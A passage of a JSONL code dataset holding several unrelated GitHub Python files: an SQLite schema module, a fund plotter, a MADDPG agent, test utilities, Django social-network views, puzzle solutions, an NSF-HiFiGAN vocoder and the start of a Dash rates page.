EXISTS Nodes')\n commit_db('CREATE TABLE Nodes('\n 'NodeID INTEGER PRIMARY KEY,'\n 'Lat FLOAT,'\n 'Lon FLOAT)')\n elif entity == 'Weighted':\n commit_db('DROP TABLE IF EXISTS Weighted')\n commit_db('CREATE TABLE Weighted('\n 'GridID INTEGER,'\n 'GraphID INTEGER,'\n 'Factor FLOAT);')\n elif entity == 'Bounds':\n commit_db('DROP TABLE IF EXISTS Bounds')\n commit_db('CREATE TABLE Bounds('\n 'Direction TEXT,'\n 'Value FLOAT);')\n elif entity == 'BoundsBuildings':\n commit_db('DROP TABLE IF EXISTS BoundsBuildings')\n commit_db('CREATE TABLE BoundsBuildings('\n 'Polygon TEXT);')\n elif entity == 'Buildings':\n commit_db('DROP TABLE IF EXISTS Buildings')\n commit_db('CREATE TABLE Buildings('\n 'Polygon TEXT,'\n 'Height FLOAT,'\n 'HeightGround FLOAT);')\n elif entity == 'Shadow':\n commit_db('DROP TABLE IF EXISTS Shadow')\n commit_db('CREATE TABLE Shadow('\n 'GridID INTEGER,'\n 'Polygon TEXT);')\n elif entity == 'Graph':\n commit_db('DROP TABLE IF EXISTS Graph')\n commit_db('CREATE TABLE Graph('\n 'GraphID INTEGER PRIMARY KEY,'\n 'FromID INTEGER,'\n 'ToID INTEGER,'\n 'Costs FLOAT);')\n elif entity == 'Grid':\n commit_db('DROP TABLE IF EXISTS Grid')\n commit_db('CREATE TABLE Grid('\n 'GridID INTEGER PRIMARY KEY,'\n 'Azimut FLOAT,'\n 'Elevation FLOAT);')\n elif entity == 'Date':\n commit_db('DROP TABLE IF EXISTS Date')\n commit_db('CREATE TABLE Date('\n 'DateID INTEGER PRIMARY KEY,'\n 'GridID INTEGER,'\n 'Day INTEGER,'\n 'Hour INTEGER,'\n 'Minute INTEGER,'\n 'Azimut FLOAT,'\n 'Elevation FLOAT);')\n return\n\n\ndef get_buildings():\n return query_db('SELECT * FROM Buildings')\n\n\ndef get_grid_info(grid_id):\n return query_db('SELECT Azimut, Elevation FROM Grid WHERE gridID = ?', [grid_id])[0]\n\n\ndef get_polygons(grid_id):\n polygons = []\n for row in query_db('SELECT Polygon FROM Shadow WHERE GridID = ?', [grid_id]):\n poly = Polygon([(float(coordinate.split(',')[0]), float(coordinate.split(',')[1]))\n for coordinate in row[0].split(';')])\n if poly.is_valid:\n polygons.append(poly)\n return polygons\n\n\ndef get_graph():\n nodes = {}\n for row in query_db('SELECT * FROM Nodes'):\n nodes[row[0]] = (row[1], row[2])\n return query_db('SELECT * FROM Graph'), nodes\n\n\ndef get_bounds_buildings():\n poly = query_db('SELECT Polygon FROM BoundsBuildings')[0][0]\n return [(float(coordinate.split(',')[0]), float(coordinate.split(',')[1])) for coordinate in poly.split(';')]\n","repo_name":"Fischerfredl/Schattenrouting-Parser","sub_path":"database/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28665523913","text":"#coding:utf-8\n\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport platform\n\n\ndef setup_mpl():\n fonts_dict = {\n \"Linux\": \"WenQuanYi Zen Hei\",\n \"Windows\": \"SimHei\",\n }\n # print(platform.platform())\n for system in [\"Linux\", \"Windows\"]:\n if system in platform.platform():\n matplotlib.rcParams['font.sans-serif'] = fonts_dict[system]\n matplotlib.rcParams['font.family'] = fonts_dict[system]\n matplotlib.rcParams['axes.unicode_minus'] = False\n break\n \n\nclass FundVisualizer:\n def __init__(self):\n setup_mpl() \n self.fig, self.axes = plt.subplots(nrows=2, ncols=1)\n\n def plot(self, fund, keys=['单位净值', '累计净值']):\n fund.data[keys].plot(ax=self.axes[0])\n fund.data['日增长率'].plot(ax=self.axes[1])\n plt.show() ","repo_name":"AutoRecursive/qianjinqiu","sub_path":"Fund/FundVisualizer.py","file_name":"FundVisualizer.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13131895636","text":"from maddpg.networks import ActorNetwork, CriticNetwork\nimport torch as T\nimport numpy as np\nfrom utils.noise import OUNoise\n\nclass NetworkedAgent: # An agent that is a part of a team\n def __init__(self, agent_list, n_actions, obs_len, name, n_agents, fc1_dims, fc2_dims, gamma, lr, chkpt_dir):\n self.agent_list = agent_list # List of all agents in the team\n self.n_actions = n_actions\n self.obs_len = obs_len\n self.name = name\n self.tau = 0.01\n self.gamma = gamma\n self.timestep = 0\n self.noise = OUNoise(self.n_actions) # Ornstein-Uhlenbeck noise\n\n # Networks\n self.actor = ActorNetwork(obs_len, n_actions, fc1_dims, fc2_dims, lr, chkpt_dir, f'actor_{name}')\n self.target_actor = ActorNetwork(obs_len, n_actions, fc1_dims, fc2_dims, lr, chkpt_dir, f'target_actor_{name}')\n self.critic = CriticNetwork(obs_len, n_actions, n_agents, fc1_dims, fc2_dims, lr, chkpt_dir, f'critic_{name}')\n self.target_critic = CriticNetwork(obs_len, n_actions, n_agents, fc1_dims, fc2_dims, lr, chkpt_dir, f'target_critic_{name}')\n\n self.update_network_parameters(tau=1)\n \n def choose_action(self, observation):\n # Choose an action based on the observation\n self.actor.eval()\n state = T.tensor(np.array([observation]), dtype=T.float).to(self.actor.device)\n actions = self.actor(state)\n actions += T.tensor(self.noise.noise(), dtype=T.float).to(self.actor.device) # Add noise\n actions = actions.clamp(-1, 1) # Ensure between -1 and 1\n self.actor.train()\n return actions.detach().cpu().numpy()\n\n def update_network_parameters(self, tau=None):\n # Update the target networks with tau\n if tau is None:\n tau = self.tau\n \n actor_params = self.actor.named_parameters()\n critic_params = self.critic.named_parameters()\n target_actor_params = self.target_actor.named_parameters()\n target_critic_params = self.target_critic.named_parameters()\n\n actor_state_dict = dict(actor_params)\n critic_state_dict = dict(critic_params)\n target_actor_state_dict = dict(target_actor_params)\n target_critic_state_dict = dict(target_critic_params)\n\n for name in actor_state_dict:\n actor_state_dict[name] = tau*actor_state_dict[name].clone() + (1-tau)*target_actor_state_dict[name].clone()\n\n for name in critic_state_dict:\n critic_state_dict[name] = tau*critic_state_dict[name].clone() + (1-tau)*target_critic_state_dict[name].clone()\n \n self.target_actor.load_state_dict(actor_state_dict)\n self.target_critic.load_state_dict(critic_state_dict)\n \n # Deal with noise\n def reset_noise(self):\n self.noise.reset()\n \n def scale_noise(self, scale):\n self.noise.scale = scale\n\n # Save and load models\n def save_models(self):\n self.actor.save_checkpoint()\n self.target_actor.save_checkpoint()\n self.critic.save_checkpoint()\n self.target_critic.save_checkpoint()\n\n def load_models(self):\n self.actor.load_checkpoint()\n self.target_actor.load_checkpoint()\n self.critic.load_checkpoint()\n self.target_critic.load_checkpoint()","repo_name":"WilliamFlinchbaugh/Deep-RL-Battlespace","sub_path":"maddpg/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"15765432604","text":"import socket\nimport time\n\nfrom contextlib import contextmanager\n\n\n@contextmanager\ndef timer(clock=None):\n if clock is None:\n clock = time\n\n timer = dict(start=clock.time(), end=None, elapsed=None)\n try:\n yield timer\n finally:\n timer[\"end\"] = clock.time()\n timer[\"elapsed\"] = timer[\"end\"] - timer[\"start\"]\n\n\ndef findFreePort() -> int:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.bind((\"localhost\", 0)) # with port=0 the OS will find a random free port\n port = sock.getsockname()[1]\n sock.close()\n return port\n","repo_name":"APrioriInvestments/filesystem","sub_path":"tests/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"33146509835","text":"num = input(\"Enter a number : \")\n\noriginalNum = int(num)\n\nn= len(num)\n\nsum = 0\n\nfor i in range(n):\n sum+=(int(num[i])**n)\n\nif sum==originalNum:\n print(\"Armstrong !\")\nelse:\n print(\"Not armstrong !\")\n","repo_name":"dkgohel/py-repo","sub_path":"armstrong/armstrong.py","file_name":"armstrong.py","file_ext":"py","file_size_in_byte":207,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"15062193911","text":"from django.contrib.auth import login, authenticate\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.db.models import Q\nfrom django.shortcuts import render, redirect\nfrom social.forms import UserForm, UserProfileForm, FeedbackForm, SearchForm, MessageForm, DoctorProfileForm, \\\n PatientProfileForm\nfrom social.models import UserProfile, Feedback, Message, MessageNotification\n\n\ndef home(request):\n if request.user.is_authenticated():\n return redirect(\"person\", person_id=request.user.id)\n return render(request, \"base.html\")\n\n\ndef register(request):\n if request.method == 'POST':\n uf = UserForm(request.POST, prefix='user')\n upf = UserProfileForm(request.POST, prefix='userprofile')\n if uf.is_valid() and upf.is_valid():\n user = uf.save(commit=False)\n user.set_password(uf.cleaned_data['password'])\n user.save()\n\n userprofile = upf.save(commit=False)\n userprofile.user = user\n if not userprofile.is_doctor and userprofile.doctor_type:\n userprofile.doctor_type = \"\"\n\n userprofile.save()\n\n login(request, authenticate(username=uf.cleaned_data['username'], password=uf.cleaned_data['password']))\n\n return redirect(\"home\")\n else:\n uf = UserForm(prefix='user')\n upf = UserProfileForm(prefix='userprofile')\n return render(request, 'registration/register.html', dict(userform=uf, userprofileform=upf))\n\n\ndef person(request, person_id, feedback_form=None):\n # print request.user.\n person = UserProfile.objects.get(user=person_id)\n if person.is_doctor:\n feedbacks = Feedback.objects.filter(estimated=person)\n else:\n feedbacks = Feedback.objects.filter(author=person)\n\n feedback_form = feedback_form or FeedbackForm()\n return render(request, \"person.html\", {\"person\": person, \"feedbacks\": feedbacks, \"form\": feedback_form})\n\ndef search(request):\n form = SearchForm(request.GET)\n if form.is_valid():\n persons = User.objects.filter(username__contains=form.cleaned_data.get(\"username\"))\n return render(request, \"search.html\", {'persons': persons})\n else:\n return redirect(\"home\")\n\n\ndef search_doctors(request):\n return render(request, \"search.html\", {'persons': User.objects.filter(userprofile__is_doctor=True)})\n\n\ndef search_patients(request):\n return render(request, \"search.html\", {'persons': User.objects.filter(userprofile__is_doctor=False)})\n\n\n@login_required\ndef messages(request, person_id):\n form = MessageForm(request.POST or None)\n to_person = UserProfile.objects.get(id=person_id)\n if request.method == 'POST':\n if form.is_valid():\n Message.objects.create(from_person=request.user.userprofile,\n to_person=to_person,\n text=form.cleaned_data['text'])\n if not MessageNotification.objects.filter(from_person=request.user.userprofile, to_person=to_person):\n MessageNotification.objects.create(from_person=request.user.userprofile, to_person=to_person)\n return redirect(\"messages\", person_id)\n else:\n messages = Message.objects.filter(Q(from_person=request.user.userprofile, to_person=person_id) |\n Q(from_person=person_id, to_person=request.user.userprofile))\n notification = MessageNotification.objects.filter(from_person=to_person, to_person=request.user.userprofile)\n if notification:\n notification.delete()\n return render(request, 'messages.html', {\"messages\": messages, \"send_form\": form})\n\n\n@login_required\ndef notifications(request):\n notification_set = MessageNotification.objects.filter(to_person=request.user.userprofile)\n return render(request, 'notifications.html', {\"notifications\": notification_set})\n\n\n@login_required\ndef send_feedback(request, person_id):\n if request.method == 'POST':\n feedback_form = FeedbackForm(request.POST)\n if feedback_form.is_valid():\n feedback = feedback_form.save(commit=False)\n feedback.author = request.user.userprofile\n feedback.estimated = UserProfile.objects.get(id=person_id)\n feedback.save()\n return redirect(\"person\", person_id=person_id)\n\n@login_required\ndef person_follow(request, person_id):\n request.user.userprofile.following.add(UserProfile.objects.get(user=person_id))\n return redirect(\"person\", person_id=person_id)\n\n@login_required\ndef person_unfollow(request, person_id):\n request.user.userprofile.following.remove(UserProfile.objects.get(user=person_id))\n return redirect(\"person\", person_id=person_id)\n\n@login_required\ndef editprofile(request):\n if request.user.userprofile.is_doctor:\n form = DoctorProfileForm(request.POST or None)\n else:\n form = PatientProfileForm(request.POST or None)\n\n if request.method == \"POST\":\n if form.is_valid():\n request.user.userprofile.aboutme = form.cleaned_data[\"aboutme\"]\n if request.user.userprofile.is_doctor:\n request.user.userprofile.qualification = form.cleaned_data[\"qualification\"]\n request.user.userprofile.education = form.cleaned_data[\"education\"]\n request.user.userprofile.workplace = form.cleaned_data[\"workplace\"]\n request.user.userprofile.save()\n return redirect(\"person\", request.user.id)\n\n return render(request, 'editprofile.html', {\"form\": form})\n","repo_name":"Cybran111/socialdoctor","sub_path":"social/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21661121620","text":"import os\nfrom typing import *\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn import Conv1d, ConvTranspose1d\nfrom torch.nn.utils import remove_weight_norm, weight_norm\nfrom torchaudio.transforms import Resample\n\nfrom latopia.config.nsf_hifigan import NsfHifiganConfig\nfrom latopia.torch_utils import get_padding, init_weights\n\nfrom .nv_stft import STFT\n\nLRELU_SLOPE = 0.1\n\n\nclass ResBlock1(torch.nn.Module):\n def __init__(self, h, channels, kernel_size=3, dilation=(1, 3, 5)):\n super(ResBlock1, self).__init__()\n self.h = h\n self.convs1 = nn.ModuleList(\n [\n weight_norm(\n Conv1d(\n channels,\n channels,\n kernel_size,\n 1,\n dilation=dilation[0],\n padding=get_padding(kernel_size, dilation[0]),\n )\n ),\n weight_norm(\n Conv1d(\n channels,\n channels,\n kernel_size,\n 1,\n dilation=dilation[1],\n padding=get_padding(kernel_size, dilation[1]),\n )\n ),\n weight_norm(\n Conv1d(\n channels,\n channels,\n kernel_size,\n 1,\n dilation=dilation[2],\n padding=get_padding(kernel_size, dilation[2]),\n )\n ),\n ]\n )\n self.convs1.apply(init_weights)\n\n self.convs2 = nn.ModuleList(\n [\n weight_norm(\n Conv1d(\n channels,\n channels,\n kernel_size,\n 1,\n dilation=1,\n padding=get_padding(kernel_size, 1),\n )\n ),\n weight_norm(\n Conv1d(\n channels,\n channels,\n kernel_size,\n 1,\n dilation=1,\n padding=get_padding(kernel_size, 1),\n )\n ),\n weight_norm(\n Conv1d(\n channels,\n channels,\n kernel_size,\n 1,\n dilation=1,\n padding=get_padding(kernel_size, 1),\n )\n ),\n ]\n )\n self.convs2.apply(init_weights)\n\n def forward(self, x):\n for c1, c2 in zip(self.convs1, self.convs2):\n xt = F.leaky_relu(x, LRELU_SLOPE)\n xt = c1(xt)\n xt = F.leaky_relu(xt, LRELU_SLOPE)\n xt = c2(xt)\n x = xt + x\n return x\n\n def remove_weight_norm(self):\n for l in self.convs1:\n remove_weight_norm(l)\n for l in self.convs2:\n remove_weight_norm(l)\n\n\nclass ResBlock2(torch.nn.Module):\n def __init__(self, h, channels, kernel_size=3, dilation=(1, 3)):\n super(ResBlock2, self).__init__()\n self.h = h\n self.convs = nn.ModuleList(\n [\n weight_norm(\n Conv1d(\n channels,\n channels,\n kernel_size,\n 1,\n dilation=dilation[0],\n padding=get_padding(kernel_size, dilation[0]),\n )\n ),\n weight_norm(\n Conv1d(\n channels,\n channels,\n kernel_size,\n 1,\n dilation=dilation[1],\n padding=get_padding(kernel_size, dilation[1]),\n )\n ),\n ]\n )\n self.convs.apply(init_weights)\n\n def forward(self, x):\n for c in self.convs:\n xt = F.leaky_relu(x, LRELU_SLOPE)\n xt = c(xt)\n x = xt + x\n return x\n\n def remove_weight_norm(self):\n for l in self.convs:\n remove_weight_norm(l)\n\n\nclass SineGen(torch.nn.Module):\n \"\"\"Definition of sine generator\n SineGen(samp_rate, harmonic_num = 0,\n sine_amp = 0.1, noise_std = 0.003,\n voiced_threshold = 0,\n flag_for_pulse=False)\n samp_rate: sampling rate in Hz\n harmonic_num: number of harmonic overtones (default 0)\n sine_amp: amplitude of sine-wavefrom (default 0.1)\n noise_std: std of Gaussian noise (default 0.003)\n voiced_thoreshold: F0 threshold for U/V classification (default 0)\n flag_for_pulse: this SinGen is used inside PulseGen (default False)\n Note: when flag_for_pulse is True, the first time step of a voiced\n segment is always sin(np.pi) or cos(0)\n \"\"\"\n\n def __init__(\n self,\n samp_rate,\n harmonic_num=0,\n sine_amp=0.1,\n noise_std=0.003,\n voiced_threshold=0,\n ):\n super(SineGen, self).__init__()\n self.sine_amp = sine_amp\n self.noise_std = noise_std\n self.harmonic_num = harmonic_num\n self.dim = self.harmonic_num + 1\n self.sampling_rate = samp_rate\n self.voiced_threshold = voiced_threshold\n\n def _f02uv(self, f0):\n # generate uv signal\n uv = torch.ones_like(f0)\n uv = uv * (f0 > self.voiced_threshold)\n return uv\n\n @torch.no_grad()\n def forward(self, f0, upp):\n \"\"\"sine_tensor, uv = forward(f0)\n input F0: tensor(batchsize=1, length, dim=1)\n f0 for unvoiced steps should be 0\n output sine_tensor: tensor(batchsize=1, length, dim)\n output uv: tensor(batchsize=1, length, 1)\n \"\"\"\n f0 = f0.unsqueeze(-1)\n fn = torch.multiply(\n f0, torch.arange(1, self.dim + 1, device=f0.device).reshape((1, 1, -1))\n )\n rad_values = (fn / self.sampling_rate) % 1 ###%1意味着n_har的乘积无法后处理优化\n rand_ini = torch.rand(fn.shape[0], fn.shape[2], device=fn.device)\n rand_ini[:, 0] = 0\n rad_values[:, 0, :] = rad_values[:, 0, :] + rand_ini\n is_half = rad_values.dtype is not torch.float32\n tmp_over_one = torch.cumsum(\n rad_values.double(), 1\n ) # % 1 #####%1意味着后面的cumsum无法再优化\n if is_half:\n tmp_over_one = tmp_over_one.half()\n else:\n tmp_over_one = tmp_over_one.float()\n tmp_over_one *= upp\n tmp_over_one = F.interpolate(\n tmp_over_one.transpose(2, 1),\n scale_factor=upp,\n mode=\"linear\",\n align_corners=True,\n ).transpose(2, 1)\n rad_values = F.interpolate(\n rad_values.transpose(2, 1), scale_factor=upp, mode=\"nearest\"\n ).transpose(2, 1)\n tmp_over_one %= 1\n tmp_over_one_idx = (tmp_over_one[:, 1:, :] - tmp_over_one[:, :-1, :]) < 0\n cumsum_shift = torch.zeros_like(rad_values)\n cumsum_shift[:, 1:, :] = tmp_over_one_idx * -1.0\n rad_values = rad_values.double()\n cumsum_shift = cumsum_shift.double()\n sine_waves = torch.sin(\n torch.cumsum(rad_values + cumsum_shift, dim=1) * 2 * np.pi\n )\n if is_half:\n sine_waves = sine_waves.half()\n else:\n sine_waves = sine_waves.float()\n sine_waves = sine_waves * self.sine_amp\n return sine_waves\n\n\nclass SourceModuleHnNSF(torch.nn.Module):\n \"\"\"SourceModule for hn-nsf\n SourceModule(sampling_rate, harmonic_num=0, sine_amp=0.1,\n add_noise_std=0.003, voiced_threshod=0)\n sampling_rate: sampling_rate in Hz\n harmonic_num: number of harmonic above F0 (default: 0)\n sine_amp: amplitude of sine source signal (default: 0.1)\n add_noise_std: std of additive Gaussian noise (default: 0.003)\n note that amplitude of noise in unvoiced is decided\n by sine_amp\n voiced_threshold: threhold to set U/V given F0 (default: 0)\n Sine_source, noise_source = SourceModuleHnNSF(F0_sampled)\n F0_sampled (batchsize, length, 1)\n Sine_source (batchsize, length, 1)\n noise_source (batchsize, length 1)\n uv (batchsize, length, 1)\n \"\"\"\n\n def __init__(\n self,\n sampling_rate,\n harmonic_num=0,\n sine_amp=0.1,\n add_noise_std=0.003,\n voiced_threshod=0,\n ):\n super(SourceModuleHnNSF, self).__init__()\n\n self.sine_amp = sine_amp\n self.noise_std = add_noise_std\n\n # to produce sine waveforms\n self.l_sin_gen = SineGen(\n sampling_rate, harmonic_num, sine_amp, add_noise_std, voiced_threshod\n )\n\n # to merge source harmonics into a single excitation\n self.l_linear = torch.nn.Linear(harmonic_num + 1, 1)\n self.l_tanh = torch.nn.Tanh()\n\n def forward(self, x, upp):\n sine_wavs = self.l_sin_gen(x, upp)\n sine_merge = self.l_tanh(self.l_linear(sine_wavs))\n return sine_merge\n\n\nclass Generator(torch.nn.Module):\n def __init__(self, h: NsfHifiganConfig):\n super(Generator, self).__init__()\n self.h = h\n self.num_kernels = len(h.resblock_kernel_sizes)\n self.num_upsamples = len(h.upsample_rates)\n self.m_source = SourceModuleHnNSF(sampling_rate=h.sampling_rate, harmonic_num=8)\n self.noise_convs = nn.ModuleList()\n self.conv_pre = weight_norm(\n Conv1d(h.num_mels, h.upsample_initial_channel, 7, 1, padding=3)\n )\n resblock = ResBlock1 if h.resblock == \"1\" else ResBlock2\n\n self.ups = nn.ModuleList()\n for i, (u, k) in enumerate(zip(h.upsample_rates, h.upsample_kernel_sizes)):\n c_cur = h.upsample_initial_channel // (2 ** (i + 1))\n self.ups.append(\n weight_norm(\n ConvTranspose1d(\n h.upsample_initial_channel // (2**i),\n h.upsample_initial_channel // (2 ** (i + 1)),\n k,\n u,\n padding=(k - u) // 2,\n )\n )\n )\n if i + 1 < len(h.upsample_rates): #\n stride_f0 = int(np.prod(h.upsample_rates[i + 1 :]))\n self.noise_convs.append(\n Conv1d(\n 1,\n c_cur,\n kernel_size=stride_f0 * 2,\n stride=stride_f0,\n padding=stride_f0 // 2,\n )\n )\n else:\n self.noise_convs.append(Conv1d(1, c_cur, kernel_size=1))\n self.resblocks = nn.ModuleList()\n ch = h.upsample_initial_channel\n for i in range(len(self.ups)):\n ch //= 2\n for j, (k, d) in enumerate(\n zip(h.resblock_kernel_sizes, h.resblock_dilation_sizes)\n ):\n self.resblocks.append(resblock(h, ch, k, d))\n\n self.conv_post = weight_norm(Conv1d(ch, 1, 7, 1, padding=3))\n self.ups.apply(init_weights)\n self.conv_post.apply(init_weights)\n self.upp = int(np.prod(h.upsample_rates))\n\n def forward(self, x, f0):\n har_source = self.m_source(f0, self.upp).transpose(1, 2)\n x = self.conv_pre(x)\n for i in range(self.num_upsamples):\n x = F.leaky_relu(x, LRELU_SLOPE)\n x = self.ups[i](x)\n x_source = self.noise_convs[i](har_source)\n x = x + x_source\n xs = None\n for j in range(self.num_kernels):\n if xs is None:\n xs = self.resblocks[i * self.num_kernels + j](x)\n else:\n xs += self.resblocks[i * self.num_kernels + j](x)\n x = xs / self.num_kernels\n x = F.leaky_relu(x)\n x = self.conv_post(x)\n x = torch.tanh(x)\n\n return x\n\n def remove_weight_norm(self):\n print(\"Removing weight norm...\")\n for l in self.ups:\n remove_weight_norm(l)\n for l in self.resblocks:\n l.remove_weight_norm()\n remove_weight_norm(self.conv_pre)\n remove_weight_norm(self.conv_post)\n\n\ndef load_nsf_hifigan(model_dir: str):\n config_path = os.path.join(model_dir, \"config.json\")\n config = NsfHifiganConfig.parse_json(config_path)\n vocoder = Generator(config)\n state_dict = torch.load(os.path.join(model_dir, \"model\"))\n vocoder.load_state_dict(state_dict[\"generator\"])\n return vocoder, config\n\n\nclass Vocoder:\n def __init__(self, vocoder_type: str, vocoder_dir: str, device=None):\n if device is None:\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n self.device = device\n\n if vocoder_type == \"nsf-hifigan\":\n self.vocoder = NsfHifiGAN(vocoder_dir, device=device)\n elif vocoder_type == \"nsf-hifigan-log10\":\n self.vocoder = NsfHifiGANLog10(vocoder_dir, device=device)\n else:\n raise ValueError(f\" [x] Unknown vocoder: {vocoder_type}\")\n\n self.resample_kernel = {}\n self.vocoder_sample_rate = self.vocoder.sample_rate()\n self.vocoder_hop_size = self.vocoder.hop_size()\n self.dimension = self.vocoder.dimension()\n\n def extract(self, audio, sample_rate, keyshift=0):\n # resample\n if sample_rate == self.vocoder_sample_rate:\n audio_res = audio\n else:\n key_str = str(sample_rate)\n if key_str not in self.resample_kernel:\n self.resample_kernel[key_str] = Resample(\n sample_rate, self.vocoder_sample_rate, lowpass_filter_width=128\n ).to(self.device)\n audio_res = self.resample_kernel[key_str](audio)\n\n # extract\n mel = self.vocoder.extract(audio_res, keyshift=keyshift) # B, n_frames, bins\n return mel\n\n def infer(self, mel, f0):\n f0 = f0[:, : mel.size(1), 0] # B, n_frames\n audio = self.vocoder(mel, f0)\n return audio\n\n\nclass NsfHifiGAN(torch.nn.Module):\n def __init__(self, model_dir: str, device: torch.device):\n super().__init__()\n self.device = device\n self.model_dir = model_dir\n self.model, self.config = load_nsf_hifigan(model_dir)\n self.model = self.model.to(device)\n self.stft = STFT(\n self.config.sampling_rate,\n self.config.num_mels,\n self.config.n_fft,\n self.config.win_size,\n self.config.hop_size,\n self.config.fmin,\n self.config.fmax,\n )\n\n def sample_rate(self):\n return self.config.sampling_rate\n\n def hop_size(self):\n return self.config.hop_size\n\n def dimension(self):\n return self.config.num_mels\n\n def extract(self, audio, keyshift=0):\n mel = self.stft.get_mel(audio, keyshift=keyshift).transpose(\n 1, 2\n ) # B, n_frames, bins\n return mel\n\n def forward(self, mel, f0):\n with torch.no_grad():\n c = mel.transpose(1, 2)\n audio = self.model(c, f0)\n return audio\n\n\nclass NsfHifiGANLog10(NsfHifiGAN):\n def forward(self, mel, f0):\n with torch.no_grad():\n c = 0.434294 * mel.transpose(1, 2)\n audio = self.model(c, f0)\n return audio\n","repo_name":"ddPn08/Latopia","sub_path":"latopia/diffusion/vocoder.py","file_name":"vocoder.py","file_ext":"py","file_size_in_byte":15704,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"61"} +{"seq_id":"31137975480","text":"# In MATLAB, there is a very useful function called 'reshape', which can reshape\n# a matrix into a new one with different size but keep its original data.\n# \n#\n# \n# You're given a matrix represented by a two-dimensional array, and two positive\n# integers r and c representing the row number and column number of the wanted res\n# haped matrix, respectively.\n#\n# The reshaped matrix need to be filled with all the elements of the original ma\n# trix in the same row-traversing order as they were.\n# \n#\n# \n# If the 'reshape' operation with given parameters is possible and legal, output\n# the new reshaped matrix; Otherwise, output the original matrix.\n# \n#\n# Example 1: \n# \n# Input:\n# nums =\n# [[1,2],\n# [3,4]]\n# r = 1, c = 4\n# Output:\n# [[1,2,3,4]]\n# Explanation: The row-traversing of nums is [1,2,3,4]. The new reshaped matrix i\n# s a 1 * 4 matrix, fill it row by row by using the previous list.\n# \n# \n#\n# Example 2: \n# \n# Input:\n# nums =\n# [[1,2],\n# [3,4]]\n# r = 2, c = 4\n# Output:\n# [[1,2],\n# [3,4]]\n# Explanation: There is no way to reshape a 2 * 2 matrix to a 2 * 4 matrix. So ou\n# tput the original matrix.\n# \n# \n#\n# Note: \n# \n# The height and width of the given matrix is in range [1, 100]. \n# The given r and c are all positive. \n# \n# Related Topics Array\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def matrixReshape(self, nums: List[List[int]], r: int, c: int) -> List[List[int]]:\n m = len(nums[0])\n n = len(nums)\n if m * n != r * c:\n return nums\n result = [[0 for _ in range(c)] for _ in range(r)]\n for x in range(r):\n for y in range(c):\n col = (x * c + y) % m\n row = (x * c + y - col) // m\n result[x][y] = nums[row][col]\n return result\n\n# leetcode submit region end(Prohibit modification and deletion)\n","repo_name":"W-KE/Leetcode-Solutions","sub_path":"leetcode/editor/en/566.reshape-the-matrix.py","file_name":"566.reshape-the-matrix.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23559274511","text":"\nq=int(input())\nfor z in range(0,q):\n a=int(input())\n while 1:\n s=str(a)\n for i in range(0,len(s)-1):\n if s[i]>s[i+1]:\n a-=1\n break\n else:\n print(\"Case #\"+str(z+1)+\":\",a)\n break","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/3667.py","file_name":"3667.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"533347957","text":"import dash\nfrom dash import html, dcc, callback, Input, Output\nimport dash_bootstrap_components as dbc\n\ndash.register_page(__name__, path='/rates')\n\n# the style arguments for the sidebar. We use position:fixed and a fixed width\nSIDEBAR_STYLE = {\n \"position\": \"fixed\",\n \"top\": \"56px\",\n \"left\": 0,\n \"bottom\": 0,\n \"width\": \"20rem\",\n \"padding\": \"1rem 1rem\",\n \"background-color\": \"#f8f9fa\",\n}\n\n# the styles for the main content position it to the right of the sidebar and\n# add some padding.\nCONTENT_STYLE = {\n \"margin-left\": \"22rem\",\n \"margin-right\": \"2rem\",\n \"padding\": \"2rem 1rem\",\n}\n\nfirst_date = '2000-01-01'\nlast_date = '2022-12-31'\n\ndate_input = html.Div(\n dcc.DatePickerSingle(\n id='date-picker-single',\n min_date_allowed=first_date,\n max_date_allowed=last_date,\n initial_visible_month=last_date,\n disabled_days=[],\n first_day_of_week=1,\n day_size=32,\n date=last_date,\n ),\n className='text-center mt-3'\n)\n \nrate_type_input = html.Div(\n [\n dbc.Select(\n [\n \"Par Rates\", \n \"Zero Curve\", \n \"Discount Curve\",\n \"Forward Curve\"\n ],\n \"Par Rates\",\n id=\"rate-type-select\",\n class_name='mt-3 mb-3'\n ),\n ]\n)\n\ntenors_input = html.Div(\n [\n dbc.Label(\"Tenors:\", class_name='mt-3'),\n dbc.Select(\n [\"Treasury\", \"Monthly\", \"Quarterly\", \"Yearly\"],\n \"Treasury\",\n id=\"tenor-select\",\n ),\n ]\n)\n\n\ninterpolation_type_input = html.Div(\n [\n dbc.Label(\"Interpolation method:\", class_name='mt-3'),\n dbc.Select(\n [\n \"Natural Cubic Spline\",\n \"Linear\"\n ],\n \"Natural Cubic Spline\",\n id=\"interpolation-type-select\",\n ),\n ]\n)\n\nperiod_input = html.Div(\n [\n dbc.Label(\"Historical period:\"),\n dbc.RadioItems(\n id=\"radios\",\n className=\"btn-group\",\n inputClassName=\"btn-check\",\n labelClassName=\"btn 